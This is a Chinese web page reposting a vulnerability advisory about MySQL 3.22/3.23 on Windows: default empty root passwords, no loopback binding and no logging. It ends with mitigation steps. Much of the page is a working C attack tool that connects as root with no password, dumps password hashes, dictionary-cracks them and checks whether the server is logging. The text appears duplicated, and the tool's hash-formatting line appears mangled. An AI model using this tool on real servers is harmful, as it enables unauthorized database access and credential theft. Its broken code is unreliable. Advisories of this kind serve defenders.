| 订阅 | 在线投稿
分享
 
 
 

Windows操作系统下的MySQL存在默认配置多个漏洞

来源:互联网网民  宽屏版  评论
2006-12-16 16:51:04

受影响系统:

MySQL AB MySQL 3.23.9

MySQL AB MySQL 3.23.8

MySQL AB MySQL 3.23.52

MySQL AB MySQL 3.23.51

MySQL AB MySQL 3.23.50

MySQL AB MySQL 3.23.5

MySQL AB MySQL 3.23.49

MySQL AB MySQL 3.23.48

MySQL AB MySQL 3.23.47

MySQL AB MySQL 3.23.46

MySQL AB MySQL 3.23.45

MySQL AB MySQL 3.23.44

MySQL AB MySQL 3.23.43

MySQL AB MySQL 3.23.42

MySQL AB MySQL 3.23.41

MySQL AB MySQL 3.23.40

MySQL AB MySQL 3.23.4

MySQL AB MySQL 3.23.39

MySQL AB MySQL 3.23.38

MySQL AB MySQL 3.23.37

MySQL AB MySQL 3.23.36

MySQL AB MySQL 3.23.34

MySQL AB MySQL 3.23.31

MySQL AB MySQL 3.23.30

MySQL AB MySQL 3.23.3

MySQL AB MySQL 3.23.29

MySQL AB MySQL 3.23.28 gamma

MySQL AB MySQL 3.23.28

MySQL AB MySQL 3.23.27

MySQL AB MySQL 3.23.26

MySQL AB MySQL 3.23.25

MySQL AB MySQL 3.23.24

MySQL AB MySQL 3.23.23

MySQL AB MySQL 3.23.2

MySQL AB MySQL 3.23.10

MySQL AB MySQL 3.22.32

MySQL AB MySQL 3.22.30

MySQL AB MySQL 3.22.29

MySQL AB MySQL 3.22.28

MySQL AB MySQL 3.22.27

MySQL AB MySQL 3.22.26

- Microsoft Windows NT 4.0

- Microsoft Windows 98

- Microsoft Windows 2000

描述:

--------------------------------------------------------------------------------

BUGTRAQ ID: 5513

MySQL是一款开放源代码关系数据库系统,可使用在多种操作系统下,包括Microsoft Windows系统。

MySQL默认配置存在多个问题,远程攻击者可以利用这些漏洞访问数据库,更改数据库操作或者攻击不被记录。

Windows下的MySQL默认配置存在3个问题:

1)默认ROOT空密码问题:

MySQL允许通过内部数据库系统表'mysql.user'管理用户,这张表包括用户的用户名,密码和主机字段,MySQL默认情况下没有对ROOT帐户设置密码,攻击者可以使用这个帐户无需密码登录。

2)非回环地址绑定问题:

大多数MySQL用户在WEB服务器相同主机上安装运行MySQL数据库,在MySQL配置文件中,其中的'bind-address=127.0.0.1'一行被注释掉的,如果服务器绑定为回环地址中,就只允许运行数据库的主机进行访问,但是由于这一行被注释,所以MySQL数据库运行任意用户从任意主机上登录访问,结合ROOT用户空密码漏洞,就可以以ROOT权限访问数据库。

上面两个问题是:

Windows平台默认安装的MySQL的user表是这样的:

mysql> select Host,User,Password,Select_priv,Grant_priv from user;

+-----------+------+----------+-------------+------------+

| Host | User | Password | Select_priv | Grant_priv |

+-----------+------+----------+-------------+------------+

| localhost | root | | Y | Y |

| % | root | | Y | Y |

| localhost | | | Y | Y |

| % | | | N | N |

+-----------+------+----------+-------------+------------+

其设置ROOT密码为空,而且主机字段为'%',表示允许可从所有主机进行连接。所以Windows下的MySQL可以以ROOT用户名无需密码从任意主机登录数据库。

3)没有日志功能:

日志是任何软件所必须的一部分,MySQL默认情况下在Windows系统中不进行日志记录,这意味着管理员将不能检测数据库是否被破坏,或者攻击者进行暴力攻击进行帐户猜测,也不会被记录。

<*来源:Mike Bommarito (g0thm0g@attbi.com)

链接:http://marc.theaimsgroup.com/?l=bugtraq&m=102978779419465&w=2

*>

测试方法:

--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Mike Bommarito(g0thm0g@attbi.com) 提供了如下测试程序:

//mysqlfuck.c

/*--||MySQLfuck||--*/

/*Written by g0thm0g*/

/*-----------------*/

/*Earlier this summer (at least where I live), I had a

conversation with a friend.

It was one of those afternoons where you get an idea,

and it kinda sticks with you.

Anyway, our conversation involved a couple questions

about INSERT's into a MySQL

database. Eventually, I told him that I would do it

for him. I came over, sat down

on his computer, and accidentally typed his full IP

address in. TO my surprise, the

host still connected. Even worse, root login wasn't

passworded. I figured that he

had mysql bound to 127.0.0.1, and that no real remote

host could connect. However,

later that night after I had gone home, I got a phone

call from the friend asking me

to do it again. Already on the computer (go figure

d:), I pulled up bash and

typed in his IP. Right as I was about to ask him what

his password was, I noticed

that MySQL hadn't even bothered to authenticate me. I

"used mysql" and then SELECT'ed

user,password,host FROM user. To my horror, I recieved:

+------+----------+-----------+

| user | password | host |

+------+----------+-----------+

| root | | localhost |

| root | | % |

| | | localhost |

| | | % |

+------+----------+-----------+

Not only was name-less login allowed, but root was

without password on localhost

and remote. Anyway, to make a long story short, I did

some research, and found that

default Windows MySQL configuration lacks logging or

authentication. I did some

network scanning, and I think I have around 400 hosts

with no root password. Anyway,

to automate checking this, I wrote this program up. It

tries to login as root/NULL,

then takes the values of the user password hashes and

tries to find a match to a

dictionary file called dictionary.txt.

I wrote up an advisory, which you'll probably see on

SecFoc soon.

If I had some cookies, I'd give them to:

-Tiefer and his relentless questioning and jokes about

my sister

-Club 21, especially for Hard Attack

-DJ Doboy, can't forget trancequility volume 19

(INSERT STANDARD "NOT-TO-BE-USED-FOR-ILLEGAL-USE"

CLAUSE HERE)

(INSERT STANDARD "I-HOLD-NO-LIABILITY" CLAUSE HERE)

Compile:

-MSVC= cl mysqlfuck.c libmySQL.lib /DWIN32 -O2

-GCC= gcc -omysqlfuck mysqlfuck.c -lmySQL -O2

-Cheers

g0th

*/

#include <stdio.h>

#ifdef WIN32

#include <windows.h>

#endif

#include <mysql.h>

/*_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-*?

/*Crazy MySQL programmers and their short typedefs*/

/*-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-*/

#ifndef ulong

#define ulong unsigned long

#endif

#ifndef uint

#define uint unsigned int

#endif

#ifndef uchar

#define uchar unsigned char

#endif

/*_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-*?

/*##--####--####--####--####--####--####--####--##*/

/*-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-*/

/*--------------------------------------------------------------*/

/*<<<<This section is ripped straight from the MySQL

source.>>>>*/

/*I have this all nice and optimized in assembly on my

end, but*/

/*writing cross-compiler inline is not too fun, and

requring an*/

/*assembler is kinda frustrating.*/

/*--------------------------------------------------------------*/

void hash_password(ulong *result, const char *password)

{

register ulong nr=1345345333L, add=7, nr2=0x12345671L;

ulong tmp;

for (; *password ; password++)

{

if (*password == ' ' || *password == '\t')

continue; /* skipp space in password */

tmp= (ulong) (uchar) *password;

nr^= (((nr & 63)+add)*tmp)+ (nr << 8);

nr2+=(nr2 << 8) ^ nr;

add+=tmp;

}

result[0]=nr & 2147483647; /* Don't use sign bit

(str2int) */;

result[1]=nr2 & 2147483647;

return;

}

void make_scrambled_password(char *to,const char *password)

{

ulong hash_res[2];

hash_password(hash_res,password);

sprintf(to,"0000000000000000",hash_res[0],hash_res[1]);

}

/*--------------------------------------------------------------*/

/*<<<<######################################################>>>>*/

/*--------------------------------------------------------------*/

/*%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%*/

/*--------------------------------*/

/*<<<user struct to store data>>>>*/

/*--------------------------------*/

typedef struct

{

char *user;

char *password;

} user;

#define MAX_USERS 16

/*--------------------------------*/

/*<<<<########################>>>>*/

/*--------------------------------*/

//main - for "coherency's" (yes, i mean laziness) sake,

i've kept this a single function

int

main

(

int argc,

char** argv

)

{

MYSQL * mysqlData; //--|-

MYSQL_RES * mysqlResult; //--|-MySQL Datatypes

MYSQL_ROW mysqlRow; //--|-

char *spHost; //--|

char *spUser="root"; //--|

char *spPassword=NULL; //--|-Our connection data

int spPort=3306; //--|

char *spServerVersion; //--|

int usernum=0; //--|

user *users[MAX_USERS]; //--|-User name/hash storage

data

FILE *fin, *fout; //--|

char *file_name; //--|-File I/O data

char *line=(char *)malloc(64); //--|

char *buff=(char *)malloc(64); //--|-Miscellaneous

buffers

int i=0; //--|Counter

//Warn about not meeting minimal arguments

if (2>argc)

{

fprintf (stderr, "usage: mysqlfuck host [-p<port>]");

return -1;

}

//Copy the first argument into the host buffer

spHost=(char *)malloc(sizeof(argv[1]));

strcpy (spHost, argv[1]);

//Copy port if the user specified

if (argv[2])

{

if (argv[2][1]=='p')

{

++argv[2];

++argv[2];

spPort=atoi(argv[2]);

printf ("port: %i\n", spPort);

}

}

//Initialize MySQL data and connect with root/NULL

mysqlData = (MYSQL *)malloc(sizeof(MYSQL));

mysql_init (mysqlData);

if (! mysql_real_connect (mysqlData, spHost, spUser,

spPassword, "mysql", spPort, NULL, 0) )

{

fprintf (stderr, "mysql_real_connect: %s\n",

mysql_error (mysqlData));

return -1;

}

//If the server logs, inform the user!

printf ("server version: %s\n",

mysql_get_server_info(mysqlData));

if (strstr (mysql_get_server_info (mysqlData), "log"))

{

printf ("Warning! Server is logging - Continue(*/n)?");

if (getchar()=='n')

{

mysql_close (mysqlData);

return -1;

}

}

//"Obtain" the hashes (notice i didn't use the word

steal)

if ( mysql_query (mysqlData, "SELECT user,password

FROM user") )

{

fprintf (stderr, "mysql_query: %s\n", mysql_error

(mysqlData));

return -1;

}

//Store the result and process it

mysqlResult=mysql_store_result(mysqlData);

while (mysqlRow=mysql_fetch_row(mysqlResult))

{

if (strlen(mysqlRow[0])==0)

{

mysqlRow[0]="(NULL)";

}

if (strlen(mysqlRow[1])==0)

{

mysqlRow[1]="(NULL)";

}

users[usernum]=(user *)malloc(sizeof(user));

users[usernum]->user=(char

*)malloc(strlen(mysqlRow[0])+1);

strcpy (users[usernum]->user, mysqlRow[0]);

users[usernum]->password=(char

*)malloc(strlen(mysqlRow[1])+1);

strcpy (users[usernum]->password, mysqlRow[1]);

usernum++;

}

mysql_close (mysqlData);

//Setup putput file name string

file_name=(char *)malloc (sizeof(spHost)+4);

strcpy (file_name, spHost);

strcat (file_name, ".txt\0\0");

printf ("\n+----------------------------+\n");

printf ("<decrypting and dumping to %s>\n", file_name);

printf ("+----------------------------+\n");

fout=fopen (spHost, "w");

if (!fout)

{

fprintf (stderr, "Unable to open %s for password

dumping\n", spHost);

return -1;

}

//Use a database to crack the hashes (optional)

fin=fopen ("dictionary.txt", "r");

if (!fin)

{

fprintf (stderr, "error opening dictionary.txt - no

decryption will take place\n");

for (i=0;i<usernum;i++)

{

printf ("%s::%s\n", users[i]->user,

users[i]->password);

}

return -1;

}

//Loop through the user array and crack/output hashes

for (i=0;i<usernum;i++)

{

if (users[i]->user)

{

if (users[i]->password)

{

while ( (fgets (line, 63, fin)))

{

line[strlen(line)-1]='\0';

make_scrambled_password (buff, line);

if (strcmp (buff, users[i]->password)==0)

{

users[i]->password=line;

break;

}

}

fclose (fin);

fprintf (fout, "%s::%s\n", users[i]->user,

users[i]->password);

printf ("%s::%s\n", users[i]->user,

users[i]->password);

fflush (fout);

}

}

}

//Always clean up after yourself!

fclose (fout);

if (buff)

free (buff);

if (line)

free (line);

if (spHost)

free (spHost);

if (users)

free (users);

if (file_name)

free (file_name);

if (mysqlData)

free (mysqlData);

}

建议:

--------------------------------------------------------------------------------

临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 1) 给root加口令

mysql> set password for root@localhost=password('password');

* 2) 删除User表里匿名用户和Host字段为%的记录

mysql> delete from user where user='';

mysql> delete from user where host='%';

mysql> flush privileges

* 3) 把配置文件中的'bind-address=127.0.0.1'注释符去掉,然后重新启动MySQL。

* 4) 在my.ini中增加:

log-long-format

log=/path/to/somewhere/log.txt

然后重新启动MySQL。

厂商补丁:

MySQL AB

--------

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.mysql.com/

 
特别声明:以上内容(如有图片或视频亦包括在内)为网络用户发布,本站仅提供信息存储服务。
 
受影响系统: MySQL AB MySQL 3.23.9 MySQL AB MySQL 3.23.8 MySQL AB MySQL 3.23.52 MySQL AB MySQL 3.23.51 MySQL AB MySQL 3.23.50 MySQL AB MySQL 3.23.5 MySQL AB MySQL 3.23.49 MySQL AB MySQL 3.23.48 MySQL AB MySQL 3.23.47 MySQL AB MySQL 3.23.46 MySQL AB MySQL 3.23.45 MySQL AB MySQL 3.23.44 MySQL AB MySQL 3.23.43 MySQL AB MySQL 3.23.42 MySQL AB MySQL 3.23.41 MySQL AB MySQL 3.23.40 MySQL AB MySQL 3.23.4 MySQL AB MySQL 3.23.39 MySQL AB MySQL 3.23.38 MySQL AB MySQL 3.23.37 MySQL AB MySQL 3.23.36 MySQL AB MySQL 3.23.34 MySQL AB MySQL 3.23.31 MySQL AB MySQL 3.23.30 MySQL AB MySQL 3.23.3 MySQL AB MySQL 3.23.29 MySQL AB MySQL 3.23.28 gamma MySQL AB MySQL 3.23.28 MySQL AB MySQL 3.23.27 MySQL AB MySQL 3.23.26 MySQL AB MySQL 3.23.25 MySQL AB MySQL 3.23.24 MySQL AB MySQL 3.23.23 MySQL AB MySQL 3.23.2 MySQL AB MySQL 3.23.10 MySQL AB MySQL 3.22.32 MySQL AB MySQL 3.22.30 MySQL AB MySQL 3.22.29 MySQL AB MySQL 3.22.28 MySQL AB MySQL 3.22.27 MySQL AB MySQL 3.22.26 - Microsoft Windows NT 4.0 - Microsoft Windows 98 - Microsoft Windows 2000 描述: -------------------------------------------------------------------------------- BUGTRAQ ID: 5513 MySQL是一款开放源代码关系数据库系统,可使用在多种操作系统下,包括Microsoft Windows系统。 MySQL默认配置存在多个问题,远程攻击者可以利用这些漏洞访问数据库,更改数据库操作或者攻击不被记录。 Windows下的MySQL默认配置存在3个问题: 1)默认ROOT空密码问题: MySQL允许通过内部数据库系统表'mysql.user'管理用户,这张表包括用户的用户名,密码和主机字段,MySQL默认情况下没有对ROOT帐户设置密码,攻击者可以使用这个帐户无需密码登录。 2)非回环地址绑定问题: 大多数MySQL用户在WEB服务器相同主机上安装运行MySQL数据库,在MySQL配置文件中,其中的'bind-address=127.0.0.1'一行被注释掉的,如果服务器绑定为回环地址中,就只允许运行数据库的主机进行访问,但是由于这一行被注释,所以MySQL数据库运行任意用户从任意主机上登录访问,结合ROOT用户空密码漏洞,就可以以ROOT权限访问数据库。 上面两个问题是: Windows平台默认安装的MySQL的user表是这样的: mysql> select Host,User,Password,Select_priv,Grant_priv from user; +-----------+------+----------+-------------+------------+ | Host | User | Password | Select_priv | Grant_priv | +-----------+------+----------+-------------+------------+ | localhost | root | | Y | Y | | % | root | | Y | Y | | localhost | | | Y | Y | | % | | | N | N | +-----------+------+----------+-------------+------------+ 其设置ROOT密码为空,而且主机字段为'%',表示允许可从所有主机进行连接。所以Windows下的MySQL可以以ROOT用户名无需密码从任意主机登录数据库。 3)没有日志功能: 日志是任何软件所必须的一部分,MySQL默认情况下在Windows系统中不进行日志记录,这意味着管理员将不能检测数据库是否被破坏,或者攻击者进行暴力攻击进行帐户猜测,也不会被记录。 <*来源:Mike Bommarito (g0thm0g@attbi.com) 链接:http://marc.theaimsgroup.com/?l=bugtraq&m=102978779419465&w=2 *> 测试方法: -------------------------------------------------------------------------------- 警 告 以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负! Mike Bommarito(g0thm0g@attbi.com) 提供了如下测试程序: //mysqlfuck.c /*--||MySQLfuck||--*/ /*Written by g0thm0g*/ /*-----------------*/ /*Earlier this summer (at least where I live), I had a conversation with a friend. It was one of those afternoons where you get an idea, and it kinda sticks with you. Anyway, our conversation involved a couple questions about INSERT's into a MySQL database. Eventually, I told him that I would do it for him. I came over, sat down on his computer, and accidentally typed his full IP address in. TO my surprise, the host still connected. Even worse, root login wasn't passworded. I figured that he had mysql bound to 127.0.0.1, and that no real remote host could connect. However, later that night after I had gone home, I got a phone call from the friend asking me to do it again. Already on the computer (go figure d:), I pulled up bash and typed in his IP. Right as I was about to ask him what his password was, I noticed that MySQL hadn't even bothered to authenticate me. I "used mysql" and then SELECT'ed user,password,host FROM user. To my horror, I recieved: +------+----------+-----------+ | user | password | host | +------+----------+-----------+ | root | | localhost | | root | | % | | | | localhost | | | | % | +------+----------+-----------+ Not only was name-less login allowed, but root was without password on localhost and remote. Anyway, to make a long story short, I did some research, and found that default Windows MySQL configuration lacks logging or authentication. I did some network scanning, and I think I have around 400 hosts with no root password. Anyway, to automate checking this, I wrote this program up. It tries to login as root/NULL, then takes the values of the user password hashes and tries to find a match to a dictionary file called dictionary.txt. I wrote up an advisory, which you'll probably see on SecFoc soon. If I had some cookies, I'd give them to: -Tiefer and his relentless questioning and jokes about my sister -Club 21, especially for Hard Attack -DJ Doboy, can't forget trancequility volume 19 (INSERT STANDARD "NOT-TO-BE-USED-FOR-ILLEGAL-USE" CLAUSE HERE) (INSERT STANDARD "I-HOLD-NO-LIABILITY" CLAUSE HERE) Compile: -MSVC= cl mysqlfuck.c libmySQL.lib /DWIN32 -O2 -GCC= gcc -omysqlfuck mysqlfuck.c -lmySQL -O2 -Cheers g0th */ #include <stdio.h> #ifdef WIN32 #include <windows.h> #endif #include <mysql.h> /*_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-*? /*Crazy MySQL programmers and their short typedefs*/ /*-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-*/ #ifndef ulong #define ulong unsigned long #endif #ifndef uint #define uint unsigned int #endif #ifndef uchar #define uchar unsigned char #endif /*_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-*? /*##--####--####--####--####--####--####--####--##*/ /*-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-*/ /*--------------------------------------------------------------*/ /*<<<<This section is ripped straight from the MySQL source.>>>>*/ /*I have this all nice and optimized in assembly on my end, but*/ /*writing cross-compiler inline is not too fun, and requring an*/ /*assembler is kinda frustrating.*/ /*--------------------------------------------------------------*/ void hash_password(ulong *result, const char *password) { register ulong nr=1345345333L, add=7, nr2=0x12345671L; ulong tmp; for (; *password ; password++) { if (*password == ' ' || *password == '\t') continue; /* skipp space in password */ tmp= (ulong) (uchar) *password; nr^= (((nr & 63)+add)*tmp)+ (nr << 8); nr2+=(nr2 << 8) ^ nr; add+=tmp; } result[0]=nr & 2147483647; /* Don't use sign bit (str2int) */; result[1]=nr2 & 2147483647; return; } void make_scrambled_password(char *to,const char *password) { ulong hash_res[2]; hash_password(hash_res,password); sprintf(to,"0000000000000000",hash_res[0],hash_res[1]); } /*--------------------------------------------------------------*/ /*<<<<######################################################>>>>*/ /*--------------------------------------------------------------*/ /*%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%*/ /*--------------------------------*/ /*<<<user struct to store data>>>>*/ /*--------------------------------*/ typedef struct { char *user; char *password; } user; #define MAX_USERS 16 /*--------------------------------*/ /*<<<<########################>>>>*/ /*--------------------------------*/ //main - for "coherency's" (yes, i mean laziness) sake, i've kept this a single function int main ( int argc, char** argv ) { MYSQL * mysqlData; //--|- MYSQL_RES * mysqlResult; //--|-MySQL Datatypes MYSQL_ROW mysqlRow; //--|- char *spHost; //--| char *spUser="root"; //--| char *spPassword=NULL; //--|-Our connection data int spPort=3306; //--| char *spServerVersion; //--| int usernum=0; //--| user *users[MAX_USERS]; //--|-User name/hash storage data FILE *fin, *fout; //--| char *file_name; //--|-File I/O data char *line=(char *)malloc(64); //--| char *buff=(char *)malloc(64); //--|-Miscellaneous buffers int i=0; //--|Counter //Warn about not meeting minimal arguments if (2>argc) { fprintf (stderr, "usage: mysqlfuck host [-p<port>]"); return -1; } //Copy the first argument into the host buffer spHost=(char *)malloc(sizeof(argv[1])); strcpy (spHost, argv[1]); //Copy port if the user specified if (argv[2]) { if (argv[2][1]=='p') { ++argv[2]; ++argv[2]; spPort=atoi(argv[2]); printf ("port: %i\n", spPort); } } //Initialize MySQL data and connect with root/NULL mysqlData = (MYSQL *)malloc(sizeof(MYSQL)); mysql_init (mysqlData); if (! mysql_real_connect (mysqlData, spHost, spUser, spPassword, "mysql", spPort, NULL, 0) ) { fprintf (stderr, "mysql_real_connect: %s\n", mysql_error (mysqlData)); return -1; } //If the server logs, inform the user! printf ("server version: %s\n", mysql_get_server_info(mysqlData)); if (strstr (mysql_get_server_info (mysqlData), "log")) { printf ("Warning! Server is logging - Continue(*/n)?"); if (getchar()=='n') { mysql_close (mysqlData); return -1; } } //"Obtain" the hashes (notice i didn't use the word steal) if ( mysql_query (mysqlData, "SELECT user,password FROM user") ) { fprintf (stderr, "mysql_query: %s\n", mysql_error (mysqlData)); return -1; } //Store the result and process it mysqlResult=mysql_store_result(mysqlData); while (mysqlRow=mysql_fetch_row(mysqlResult)) { if (strlen(mysqlRow[0])==0) { mysqlRow[0]="(NULL)"; } if (strlen(mysqlRow[1])==0) { mysqlRow[1]="(NULL)"; } users[usernum]=(user *)malloc(sizeof(user)); users[usernum]->user=(char *)malloc(strlen(mysqlRow[0])+1); strcpy (users[usernum]->user, mysqlRow[0]); users[usernum]->password=(char *)malloc(strlen(mysqlRow[1])+1); strcpy (users[usernum]->password, mysqlRow[1]); usernum++; } mysql_close (mysqlData); //Setup putput file name string file_name=(char *)malloc (sizeof(spHost)+4); strcpy (file_name, spHost); strcat (file_name, ".txt\0\0"); printf ("\n+----------------------------+\n"); printf ("<decrypting and dumping to %s>\n", file_name); printf ("+----------------------------+\n"); fout=fopen (spHost, "w"); if (!fout) { fprintf (stderr, "Unable to open %s for password dumping\n", spHost); return -1; } //Use a database to crack the hashes (optional) fin=fopen ("dictionary.txt", "r"); if (!fin) { fprintf (stderr, "error opening dictionary.txt - no decryption will take place\n"); for (i=0;i<usernum;i++) { printf ("%s::%s\n", users[i]->user, users[i]->password); } return -1; } //Loop through the user array and crack/output hashes for (i=0;i<usernum;i++) { if (users[i]->user) { if (users[i]->password) { while ( (fgets (line, 63, fin))) { line[strlen(line)-1]='\0'; make_scrambled_password (buff, line); if (strcmp (buff, users[i]->password)==0) { users[i]->password=line; break; } } fclose (fin); fprintf (fout, "%s::%s\n", users[i]->user, users[i]->password); printf ("%s::%s\n", users[i]->user, users[i]->password); fflush (fout); } } } //Always clean up after yourself! fclose (fout); if (buff) free (buff); if (line) free (line); if (spHost) free (spHost); if (users) free (users); if (file_name) free (file_name); if (mysqlData) free (mysqlData); } 建议: -------------------------------------------------------------------------------- 临时解决方法: 如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁: * 1) 给root加口令 mysql> set password for root@localhost=password('password'); * 2) 删除User表里匿名用户和Host字段为%的记录 mysql> delete from user where user=''; mysql> delete from user where host='%'; mysql> flush privileges * 3) 把配置文件中的'bind-address=127.0.0.1'注释符去掉,然后重新启动MySQL。 * 4) 在my.ini中增加: log-long-format log=/path/to/somewhere/log.txt 然后重新启动MySQL。 厂商补丁: MySQL AB -------- 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: http://www.mysql.com/
󰈣󰈤
 
 
 
>>返回首页<<
 
 热帖排行
 
 
 
静静地坐在废墟上,四周的荒凉一望无际,忽然觉得,凄凉也很美
©2005- 王朝网络 版权所有